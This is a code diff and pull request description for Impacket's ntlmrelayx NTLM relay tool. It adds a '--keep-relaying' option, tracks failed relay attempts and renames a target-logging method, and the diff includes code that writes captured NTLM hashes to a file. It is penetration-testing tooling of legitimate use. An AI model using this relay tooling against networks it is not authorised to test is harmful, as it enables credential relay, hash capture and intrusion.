-                self.targetprocessor.logTarget(self.target, True, self.authUser)
+                self.targetprocessor.registerTarget(self.target, True, self.authUser)
 
                 ntlm_hash_data = outputToJohnFormat('', sessionSetupData['Account'], sessionSetupData['PrimaryDomain'],
                                                     sessionSetupData['AnsiPwd'], sessionSetupData['UnicodePwd'])
@@ -809,7 +810,7 @@ class SMBRelayServer(Thread):
             client = self.init_client(extSec)
         except Exception as e:
             LOG.error("Connection against target %s://%s FAILED: %s" % (self.target.scheme, self.target.netloc, str(e)))
-            self.targetprocessor.logTarget(self.target, False, self.authUser)
+            self.targetprocessor.registerTarget(self.target, False, self.authUser)
         else:
             connData['relayToHost'] = True
             connData['Authenticated'] = False

--- a/impacket/examples/ntlmrelayx/servers/smbrelayserver.py
+++ b/impacket/examples/ntlmrelayx/servers/smbrelayserver.py
@@ -148,7 +148,7 @@ class SMBRelayServer(Thread):
             if self.target is None:
                 LOG.info('SMBD-%s: Connection from %s controlled, but there are no more targets left!' %
                          (connId, connData['ClientIP']))
-                if self.config.enableRetries:
+                if self.config.keepRelaying:
                     self.config.target.reloadTargets(full_reload=True)
 
                 return [SMB2Error()], None, STATUS_BAD_NETWORK_NAME
@@ -430,7 +430,7 @@ class SMBRelayServer(Thread):
                 # No more targets to process, just let the victim to fail later
                 LOG.info('SMBD-%s: Connection from %s@%s controlled, but there are no more targets left!' %
                          (connId, self.authUser, connData['ClientIP']))
-                if self.config.enableRetries:
+                if self.config.keepRelaying:
                     self.config.target.reloadTargets(full_reload=True)
 
                 return self.origsmb2TreeConnect (connId, smbServer, recvPacket)
@@ -505,7 +505,7 @@ class SMBRelayServer(Thread):
             if self.target is None:
                 LOG.info('SMBD-%s: Connection from %s controlled, but there are no more targets left!' %
                          (connId, connData['ClientIP']))
-                if self.config.enableRetries:
+                if self.config.keepRelaying:
                     self.config.target.reloadTargets(full_reload=True)
 
                 return [smb.SMBCommand(smb.SMB.SMB_COM_NEGOTIATE)], None, STATUS_BAD_NETWORK_NAME
@@ -791,7 +791,7 @@ class SMBRelayServer(Thread):
                 # No more targets to process, just let the victim to fail later
                 LOG.info('SMBD-%s: Connection from %s@%s controlled, but there are no more targets left!' %
                          (connId, self.authUser, connData['ClientIP']))
-                if self.config.enableRetries:
+                if self.config.keepRelaying:
                     self.config.target.reloadTargets(full_reload=True)
 
                 return self.origsmbComTreeConnectAndX (connId, smbServer, recvPacket)

--- a/impacket/examples/ntlmrelayx/servers/wcfrelayserver.py
+++ b/impacket/examples/ntlmrelayx/servers/wcfrelayserver.py
@@ -193,7 +193,7 @@ class WCFRelayServer(Thread):
                 # Connection failed
                 LOG.error('Negotiating NTLM with %s://%s failed. Skipping to next target',
                           self.target.scheme, self.target.netloc)
-                self.server.config.target.logTarget(self.target)
+                self.server.config.target.registerTarget(self.target)
                 return
 
             # Calculate auth
@@ -272,7 +272,7 @@ class WCFRelayServer(Thread):
                 writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'],
                                       self.server.config.outputFile)
 
-            self.server.config.target.logTarget(self.target, True, self.authUser)
+            self.server.config.target.registerTarget(self.target, True, self.authUser)
 
             self.do_attack()
 

--- a/impacket/examples/ntlmrelayx/utils/config.py
+++ b/impacket/examples/ntlmrelayx/utils/config.py
@@ -43,6 +43,7 @@ class NTLMRelayxConfig:
         self.ipv6 = False
         self.remove_mic = False
         self.disableMulti = False
+        self.keepRelaying = False
 
         self.command = None
 
@@ -140,8 +141,8 @@ class NTLMRelayxConfig:
     def setDisableMulti(self, disableMulti):
         self.disableMulti = disableMulti
 
-    def setRetries(self, setRetries):
-        self.enableRetries = setRetries
+    def setKeepRelaying(self, keepRelaying):
+        self.keepRelaying = keepRelaying
 
     def setEncoding(self, encoding):
         self.encoding = encoding

--- a/impacket/examples/ntlmrelayx/utils/config.py
+++ b/impacket/examples/ntlmrelayx/utils/config.py
@@ -140,6 +140,9 @@ class NTLMRelayxConfig:
     def setDisableMulti(self, disableMulti):
         self.disableMulti = disableMulti
 
+    def setRetries(self, setRetries):
+        self.enableRetries = setRetries
+
     def setEncoding(self, encoding):
         self.encoding = encoding
 

--- a/impacket/examples/ntlmrelayx/utils/targetsutils.py
+++ b/impacket/examples/ntlmrelayx/utils/targetsutils.py
@@ -104,7 +104,7 @@ class TargetsProcessor:
         self.generalCandidates = [x for x in self.originalTargets if x not in self.finishedAttacks and x not in self.failedAttacks and x.username is None]
         self.namedCandidates = [x for x in self.originalTargets if x not in self.finishedAttacks and x not in self.failedAttacks  and x.username is not None]
 
-    def logTarget(self, target, gotRelay = False, gotUsername = None):
+    def registerTarget(self, target, gotRelay = False, gotUsername = None):
         # If the target has a username, we can safely remove it from the list. Mission accomplished.
         if target.username is not None:
             if gotRelay:

--- a/impacket/examples/ntlmrelayx/utils/targetsutils.py
+++ b/impacket/examples/ntlmrelayx/utils/targetsutils.py
@@ -46,6 +46,7 @@ class TargetsProcessor:
         # Here we store the attacks that already finished, mostly the ones that have usernames, since the
         # other ones will never finish.
         self.finishedAttacks = []
+        self.failedAttacks = []
         self.protocolClients = protocolClients
         if targetListFile is None:
             self.filename = None
@@ -59,8 +60,8 @@ class TargetsProcessor:
             # Randomize the targets based
             random.shuffle(self.originalTargets)
 
-        self.generalCandidates = [x for x in self.originalTargets if x.username is None]
-        self.namedCandidates = [x for x in self.originalTargets if x.username is not None]
+        self.reloadTargets(full_reload=True)
+
 
     @staticmethod
     def processTarget(target, protocolClients):
@@ -93,20 +94,32 @@ class TargetsProcessor:
         if len(self.originalTargets) == 0:
             LOG.critical("Warning: no valid targets specified!")
 
-        self.generalCandidates = [x for x in self.originalTargets if x not in self.finishedAttacks and x.username is None]
-        self.namedCandidates = [x for x in self.originalTargets if x not in self.finishedAttacks and x.username is not None]
+        self.reloadTargets()
+
+
+    def reloadTargets(self, full_reload=False):
+        if full_reload:
+            self.finishedAttacks = []
+            self.failedAttacks = []
+        self.generalCandidates = [x for x in self.originalTargets if x not in self.finishedAttacks and x not in self.failedAttacks and x.username is None]
+        self.namedCandidates = [x for x in self.originalTargets if x not in self.finishedAttacks and x not in self.failedAttacks  and x.username is not None]
 
     def logTarget(self, target, gotRelay = False, gotUsername = None):
         # If the target has a username, we can safely remove it from the list. Mission accomplished.
-        if gotRelay is True:
-            if target.username is not None:
+        if target.username is not None:
+            if gotRelay:
                 self.finishedAttacks.append(target)
-            elif gotUsername is not None:
-                # We have data about the username we relayed the connection for,
-                # for a target that didn't have username specified.
-                # Let's log it
-                newTarget = urlparse('%s://%s@%s%s' % (target.scheme, gotUsername.replace('/','\\'), target.netloc, target.path))
+            else:
+                self.failedAttacks.append(target)
+        elif gotUsername is not None:
+            # We have data about the username we relayed the connection for,
+            # for a target that didn't have username specified.
+            # Let's log it
+            newTarget = urlparse('%s://%s@%s%s' % (target.scheme, gotUsername.replace('/','\\'), target.netloc, target.path))
+            if gotRelay:
                 self.finishedAttacks.append(newTarget)
+            else:
+                self.failedAttacks.append(newTarget)
 
     def getTarget(self, identity=None, multiRelay=True):
         # ToDo: We should have another list of failed attempts (with user) and check that inside this method so we do not
@@ -130,9 +143,11 @@ class TargetsProcessor:
         if len(self.generalCandidates) > 0:
             if identity is not None:
                 for target in self.generalCandidates:
-                    tmpTarget = '%s://%s@%s' % (target.scheme, identity.replace('/', '\\'), target.netloc)
+                    tmpTarget = '%s://%s@%s' % (target.scheme, identity.replace('/', '\\'), target.netloc + target.path)
                     match = [x for x in self.finishedAttacks if x.geturl().upper() == tmpTarget.upper()]
-                    if len(match) == 0:
+                    fail_match = [x for x in self.failedAttacks if x.geturl().upper() == tmpTarget.upper()]
+                    print(self.failedAttacks)
+                    if len(match) == 0 and len(fail_match) == 0:
                         self.generalCandidates.remove(target)
                         return target
                 LOG.debug("No more targets for user %s" % identity)
@@ -150,8 +165,11 @@ class TargetsProcessor:
                 return self.generalCandidates.pop()
         else:
             if len(self.originalTargets) > 0:
+                # Remove credentials from the URLs (otherwise they won't ever match)
+                finishedAttacks = [an_atk._replace(netloc=an_atk.hostname) for an_atk in self.finishedAttacks]
+                failedAttacks = [an_atk._replace(netloc=an_atk.hostname) for an_atk in self.failedAttacks]
                 self.generalCandidates = [x for x in self.originalTargets if
-                                          x not in self.finishedAttacks and x.username is None]
+                                          x not in finishedAttacks and x not in failedAttacks and x.username is None]
 
         if len(self.generalCandidates) == 0:
             if len(self.namedCandidates) == 0:


### PR DESCRIPTION
This changeset addresses the issues reported in #1694 

A new flag was introduced to ntlmrelayx `--keep-relaying` which instructs the relay to keep cycling over its targets indefinitely.
This means that whether or not a relay attempt was successful against its target, said target won't ever be discarded and future connections will be relayed to it.
Keep in mind that in multirelay mode, when relaying fails against a target, no further targets will be processed until the relay receives new connection.

An example with 3 targets (always successful, multirelay enabled):
* Incoming connection 1: Target1 (success) -> Target2 (success) -> Target3(success) -> No more targets
* Incoming connection 2:
  * (Without --keep-relaying flag): No more targets
  * (With --keep-relaying flag): Target1 (success) -> Target2 (success) -> Target3(success) -> No more targets
* Incoming connection 3: Same as above

3 Targets and (the second always fails, multirelay enbled):
* Incoming connection 1: Target1 (success) -> Target2 (fail) -> Stop
* Incoming connection 2: Target3(success) -> No more targets
* Incoming connection 3: 
  * (Without --keep-relaying flag): No more targets
  * (With --keep-relaying flag): Target1 (success) -> Target2 (fail) -> Stop